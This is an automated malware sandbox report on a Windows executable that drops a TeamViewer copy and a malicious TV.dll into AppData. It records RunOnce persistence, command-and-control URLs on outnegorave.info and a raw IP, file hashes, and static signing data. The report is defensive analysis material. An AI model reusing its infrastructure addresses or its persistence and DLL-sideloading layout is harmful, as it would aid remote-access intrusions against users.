                                                                                                        https://outnegorave.info/B8C631A8/sTeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://www.roblox.com/info/privacysvchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.g5e.com/termsofservicesvchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.teamviewer.com/company/index.aspx77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                              		high
                                                                                                              http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                                		high
                                                                                                                http://www.teamviewer.com/ja/company/shutdown.aspx77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                                  		high
                                                                                                                  https://outnegorave.info/B8C631A8/xTeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://37.252.232.109/dout.aspx?s=12852408&p=10000002&client=DynGateYTeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://37.252.232.109/000&client=DynGate&rnd=197887096&p=10000001lTeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://37.252.232.109/32172969&client=DynGate&p=10000002vTeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://www.teamviewer.com/ja/licensing/commercialuse.aspxTeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.751645333.00000000025B0000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.teamviewer.com/licensing/order.aspx?lng=ja77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drfalse
                                                                                                                      		high

                                                                                                                      Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      185.188.32.1
                                                                                                                      		master1.teamviewer.comGermany
                                                                                                                      		43304TEAMVIEWER-ASDEfalse
                                                                                                                      172.67.205.33
                                                                                                                      		outnegorave.infoUnited States
                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                      37.252.232.109
                                                                                                                      		unknownAustria
                                                                                                                      		42473AS-ANEXIAANEXIAInternetdienstleistungsGmbHATfalse

                                                                                                                      Private

                                                                                                                      IP
                                                                                                                      127.0.0.1

                                                                                                                      General Information

                                                                                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                      Analysis ID:483795
                                                                                                                      Start date:15.09.2021
                                                                                                                      Start time:14:06:31
                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                      Overall analysis duration:0h 14m 57s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Sample file name:77Etc0bR2v.exe
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                      Run name:Run with higher sleep bypass
                                                                                                                      Number of analysed new started processes analysed:25
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • HDC enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal76.evad.winEXE@14/11@4/4
                                                                                                                      EGA Information:Failed
                                                                                                                      HDC Information:
                                                                                                                      • Successful, ratio: 36.4% (good quality ratio 35.4%)
                                                                                                                      • Quality average: 85.3%
                                                                                                                      • Quality standard deviation: 22.8%
                                                                                                                      HCA Information:Failed
                                                                                                                      Cookbook Comments:
                                                                                                                      • Adjust boot time
                                                                                                                      • Enable AMSI
                                                                                                                      • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      Warnings:
                                                                                                                      Show All
                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.82.209.183, 8.238.85.254, 8.248.147.254, 8.248.137.254, 8.248.113.254, 8.248.139.254, 209.197.3.8, 20.54.110.249, 40.112.88.60, 23.216.77.209, 23.216.77.208, 23.35.236.56, 20.82.210.154
                                                                                                                      • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      14:08:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe" f
                                                                                                                      14:08:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe" f
                                                                                                                      14:08:49API Interceptor1x Sleep call for process: svchost.exe modified

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      No context

                                                                                                                      Domains

                                                                                                                      No context

                                                                                                                      ASN

                                                                                                                      No context

                                                                                                                      JA3 Fingerprints

                                                                                                                      No context

                                                                                                                      Dropped Files

                                                                                                                      No context

                                                                                                                      Created / dropped Files

                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4096
                                                                                                                      Entropy (8bit):0.5972165353381301
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:0FE0k1GaD0JOCEfMuaaD0JOCEfMKQmDtS/tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0EGaD0JcaaD0JwQQ0tAg/0bjSQJ
                                                                                                                      MD5:D8D0D663F77B6A59418CC83E759489A3
                                                                                                                      SHA1:E184E188992F47890C2131012D10A617326571C6
                                                                                                                      SHA-256:EC7D75FCEB2CE0CE633F11864BE12F44AEF5FF24A105F6E20391247E1F683D2A
                                                                                                                      SHA-512:77C91200DF1C5F1B8EACBDFDFEA5FA14274194CDDFC71C4ED88B4A5E1779E9857D61A65EC783179F5D3C66F37568CF3A16E8DA4BBD7FCEDF79ECA1B9597441AA
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: ......:{..(.....1....y;.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................1....y;...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:Extensible storage user DataBase, version 0x620, checksum 0x3816929a, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):32768
                                                                                                                      Entropy (8bit):0.0970600410052794
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:6zwl/+aeXRIE11Y8TRXaNUgQKEzwl/+aeXRIE11Y8TRXaNUgQK:60+aeXO4blaegQKE0+aeXO4blaegQK
                                                                                                                      MD5:7891AF17428A431A98339B1F99EACACA
                                                                                                                      SHA1:F7CD13538D809FCBF1C53EE9DD7328229DE4CC1F
                                                                                                                      SHA-256:3D3634BEBE4D54F66B45287CF4B2AF761E3D3A4322217FB79DB7324BA4336776
                                                                                                                      SHA-512:7C465D3AF93572748353A64A5A10DE8D81A477F2BC81A3B4CF5E36327B913D76DA649304D4260948553DAF01E9C952938815BB2E67A5DDCF68E02D548BE3740C
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: 8...... ................e.f.3...w........................&..........w..1....y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................G..|1....y..................\..C1....y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8192
                                                                                                                      Entropy (8bit):0.11169102851775213
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:y9EvUCNXAl/bJdAtiif98Ball:yYUUXAt4i0
                                                                                                                      MD5:C6E7F438F2544EE49F946C530D05A73A
                                                                                                                      SHA1:138A4F1DDB20ACD9C683F96E1DE5632ECEE87400
                                                                                                                      SHA-256:6C4844ACB817093DA3055F0924DADF4BCC069E3EA8E45B69D9130F3480C62DB3
                                                                                                                      SHA-512:05F321F15CE0A76F389D0317C25597BEE96962E1445208C54766BCAB3D609C8AAEB965173CF7F228DA3A67894049C67FE0015E46B7E4B13D0BA3505FBDF8C1D4
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: zF......................................3...w..1....y.......w...............w.......w....:O.....w..................\..C1....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Local\Temp\nso5B2F.tmp
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5132919
                                                                                                                      Entropy (8bit):6.737705896318464
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:FjdgHPmMogx1WZRkPapqj+ZG/D+AKbS5ZmfzCAW6LcTjH:tqHuMogsRkyq0umfzCgi
                                                                                                                      MD5:E29F152B606F9669680D7CB24308991A
                                                                                                                      SHA1:680CC154C050B90FEA35AD0FDB97E387D62B7740
                                                                                                                      SHA-256:FF1A9205BD8076DE3811E5417AC2AEAC44D940F392B19C9D8A2833493CC8034F
                                                                                                                      SHA-512:C33DB997837A716A0F09E0E40C61D92BADFAF2A440C8EBB5BAB9F156A2CC61E91DBF7CC748D074F7743E336F93080D4BDABBC14483A23036EC68C9DDEDC40DF5
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: ........,.......,.......D.......$.......w...................................................................................................................................................................................................................................................................C...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):75256
                                                                                                                      Entropy (8bit):6.743019659267088
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:coaayOa9Z58qTGIT0XhZKfl2MjEzHPggfLD//qQmoz:p1uZ58qTGITey4zJfLD3qQmC
                                                                                                                      MD5:A44F2649C82B35D42E6036D1C75E48C4
                                                                                                                      SHA1:EE3B00701C97ED107B78ECBDF9D962F1508EDC8E
                                                                                                                      SHA-256:760945429F7EA52C40C75A0FA0424D943E317EC48575C812545CC2C4BE5B0510
                                                                                                                      SHA-512:B8340F06E3446AA91F435F4009557830BBC8E8279321F41198C076E8202869B98C156809CF3FAD8F900B569ACA2AB6B6A7725A1532E2846B31EDEC513E84734D
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.l5...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...fRich...f................PE..L.....;a...........!.........H...............................................@......v.....@......................... ...V.......@.......L................%... ..$.......................................................t............................text............................... ..`.rdata..v+.......,..................@..@.data...x...........................@....rsrc...L...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):4375848
                                                                                                                      Entropy (8bit):6.621789733656387
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:6jdgHPmMogx1WZRkPapqj+ZG/D+AKbS5m:4qHuMogsRkyq0N
                                                                                                                      MD5:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                      SHA1:A3A7498F02BAB188B3944382BBA4D016D63607D1
                                                                                                                      SHA-256:D2CDCA8EFA27089D3DEAD0CCEAFBE470B3815C9C2A362C007D1F516E5379AC92
                                                                                                                      SHA-512:412B42C540A9FE41709453D725B7A1E888849326A70A411E645F29240D730D69EBCF4B26E6870D33E0A395C612470BD00064025D22B0C6BCD211242E8EF6CEA6
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............o...o...o.......o.......o.....2.o.....q.o.F.2...o...n...o.......o.F.0...o.......o.......o.......o.Rich..o.................PE..L.....LK..................3.........F........03...@...........................K......ZC.......................................@...... K.8`............B.(...........pe4......................x:.....`x:.@............03. ............................text.....3.......3................. ..`.rdata..&....03.......3.............@..@.data...h....P@.."...*@.............@....tls..........K......LB.............@....rsrc...8`... K..b...NB.............@..@........................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.ini
                                                                                                                      Process:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                      File Type:data
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):272
                                                                                                                      Entropy (8bit):3.256847641939824
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:cAeYlA3m7D5KTsYKdyp3cQYKDClRAeYlA3m7D5KLp3gk+AeYlA3m7D5KLp3gkp:z7NzdyTmlM7NM397NM3p
                                                                                                                      MD5:64D2D142BE53943D72355DE71619BB22
                                                                                                                      SHA1:D48EC103950F4A66E7774915D6FC36CCA5240D18
                                                                                                                      SHA-256:09F60A98FEC98F6D8E7CC9421FDE08B7B34E6385FA7EC871D19BD640EE7FC881
                                                                                                                      SHA-512:26F508C945EB69D41494A5B53B16BDFCE738606A49F7D2738839FA83ED59700149739EE089F3EEB74C2F4832414B4BBFB0D46F6321EB27BAAD27E8D226B80090
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o.....h.p.n.=./.u.p.d.a.t.e./.....h.s.n.=.1.....h.t.=.6...../.B.8.C.6.3.1.A.8./.....h.s.n.=.1.....h.t.=.6.....1.3.6.....r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.r.e.n.e.a.g.e.m.o.n.e.s...i.n.f.o./.B.8.C.6.3.1.A.8./.1.3.6.
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):607528
                                                                                                                      Entropy (8bit):6.564133582926054
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:r5hmfFy7ZJ0uUCAD06v7JlHZctms+2lifZ0iMe8d6YySkYQKMDqtAu3NhgGy6wSP:Vhmf4ACAzneosEi6YhvAuUGyUrNJbL
                                                                                                                      MD5:554EE592B125CFDF81B376B5C24AA61C
                                                                                                                      SHA1:666D2C04171246734575D4453289AA2D9AF93B97
                                                                                                                      SHA-256:B296EF421D5B7F569E623D41A42D87A064C4358CFA89A192988F854929E3ABD1
                                                                                                                      SHA-512:6C3111BF9D26929D426797EBDD8D804B34E2E8F593BF488298E70964538F2DA3D971C4ED3C3237C829AE7DE4FDB8D4316D84F153E93E3788808547A8538B73F5
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-T.L:..L:..L:...F..L:...B..L:.Rich.L:.........PE..L.....LK...........!.........................................................0.......................................................................0..(.... .......................................................................................rsrc...............................@..@.reloc....... ....... ..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                      C:\Users\user\AppData\Roaming\TeamViewer\vpn.cab
                                                                                                                      Process:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                      File Type:Microsoft Cabinet archive data, 71196 bytes, 8 files
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):71196
                                                                                                                      Entropy (8bit):7.996182851828797
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:qUTRtkxXFuG1DKNYCqRBiFxMZPQCJh/njgG5+jC5hA101pNO0:qUNtax12mCqRBiyQG/jgG5+j2NO0
                                                                                                                      MD5:8A84AA1B9F20DC194947D7AC592D818E
                                                                                                                      SHA1:4A77AB0D59F39BF600BB89D9121446F6AA2D139B
                                                                                                                      SHA-256:8A740BE5D92B734E77B210354988DFD49F31C49814240513CF4B0353A8CE6DFB
                                                                                                                      SHA-512:B3F90ADB48861CD775F15E75885C81A130D62DFE429A5833FA1CE0BC203EEA15BD8A7306618B1F4D27810493300400C8B149D58032F90F0E9D93B04F9B8F1050
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: MSCF............,...............JA..H........)........k<'b..64\teamviewervpn.cat......)....k<'b..64\TeamViewerVPN.inf.(....>....k<'b..64\teamviewervpn.sys..<........k<&b..64\install.exe..)........k<'b..86\teamviewervpn.cat......-....k<'b..86\TeamViewerVPN.inf..b...B....k<'b..86\teamviewervpn.sys...........k<&b..86\install.exe.h.t"X<..[.....`.....@...N.f.|..U.......$."..L.F..4....|....U$Q/...%.J).D...@F.......f...9..../@.x;.N..w..2...i1P.....O.....T...T.y...``...;.$.&....@........@..~..\...J.44...:.@....M.....x\.0c|..W...,.|.x..+.P..N.. ..S0@B.;?.(..B..,.%.{.. ....(T.....U.5..=.3'rxci.;....P$..H)...1...h._e..{....Q._..}...K......U.s...._..WRWlS.8.._...D.NI..>.|O<..q...$0.EA*8d...../..=@2q...g_.Hs|`+...`.>U..)X.G*.8.....>..!4 ....}..Ps.a.8.......4.0`._t%...P.qgr..'..~.d..r.....o...w..q........,O.K..Y.8..M.D...p........~.....O?......}@.....>....O..N...c../p..[....._=.~.S....Q..p.O...@.WL....*..}..%1...3a.....u...)..K.Y...s..E;...".e.....X0(IR..'..1...\..6...(i
                                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):55
                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                      Malicious:false
                                                                                                                      Reputation:unknown
                                                                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):7.973639636653341
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:77Etc0bR2v.exe
                                                                                                                      File size:1828192
                                                                                                                      MD5:e71e3b995477081569ed357e4d403666
                                                                                                                      SHA1:809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
                                                                                                                      SHA256:94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
                                                                                                                      SHA512:2dca79011e40164672f7d81ed42fa9f080bca7148e451a0bf94c6bf0f6381e6eb8ee1bc3bac14e690304410a43f46994bfae76ee7d8ee2785ffaecb02f9ebd3b
                                                                                                                      SSDEEP:49152:OBGHLrZP7auvm8sJEkbxH0ulBuw8ZtTUZEoH+hE:vrdTauvkERulBaUZEoH+h
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L.....*J.................\.........

                                                                                                                      File Icon

                                                                                                                      Icon Hash:c403939c989380c8

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x40323c
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:true
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x4A2AE2A2 [Sat Jun 6 21:41:54 2009 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:5bd07784f328e868356a895d4ab1a505

                                                                                                                      Authenticode Signature

                                                                                                                      Signature Valid:true
                                                                                                                      Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                      Signature Validation Error:The operation completed successfully
                                                                                                                      Error Number:0
                                                                                                                      Not Before, Not After
                                                                                                                      • 6/3/2021 5:00:00 PM 6/4/2022 4:59:59 PM
                                                                                                                      Subject Chain
                                                                                                                      • CN=Hartex LLC, O=Hartex LLC, L=Moscow, C=RU
                                                                                                                      Version:3
                                                                                                                      Thumbprint MD5:5D5CA7E8D78224799E8AA101FF486137
                                                                                                                      Thumbprint SHA-1:319517761E92EC6EEF1966A5994570D46A498093
                                                                                                                      Thumbprint SHA-256:AC50A5D91A71BA8447EE795FF966E625AEC004E49EB24ADAA366B988686B65A5
                                                                                                                      Serial:009B576882CCDB891FD6E4A66671F3AC71

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      sub esp, 00000180h
                                                                                                                      push ebx
                                                                                                                      push ebp
                                                                                                                      push esi
                                                                                                                      xor ebx, ebx
                                                                                                                      push edi
                                                                                                                      mov dword ptr [esp+18h], ebx
                                                                                                                      mov dword ptr [esp+10h], 00409130h
                                                                                                                      xor esi, esi
                                                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                                                      call dword ptr [00407030h]
                                                                                                                      push 00008001h
                                                                                                                      call dword ptr [004070B4h]
                                                                                                                      push ebx
                                                                                                                      call dword ptr [0040727Ch]
                                                                                                                      push 00000008h
                                                                                                                      mov dword ptr [00423F58h], eax
                                                                                                                      call 00007F58B4E4EF2Eh
                                                                                                                      mov dword ptr [00423EA4h], eax
                                                                                                                      push ebx
                                                                                                                      lea eax, dword ptr [esp+34h]
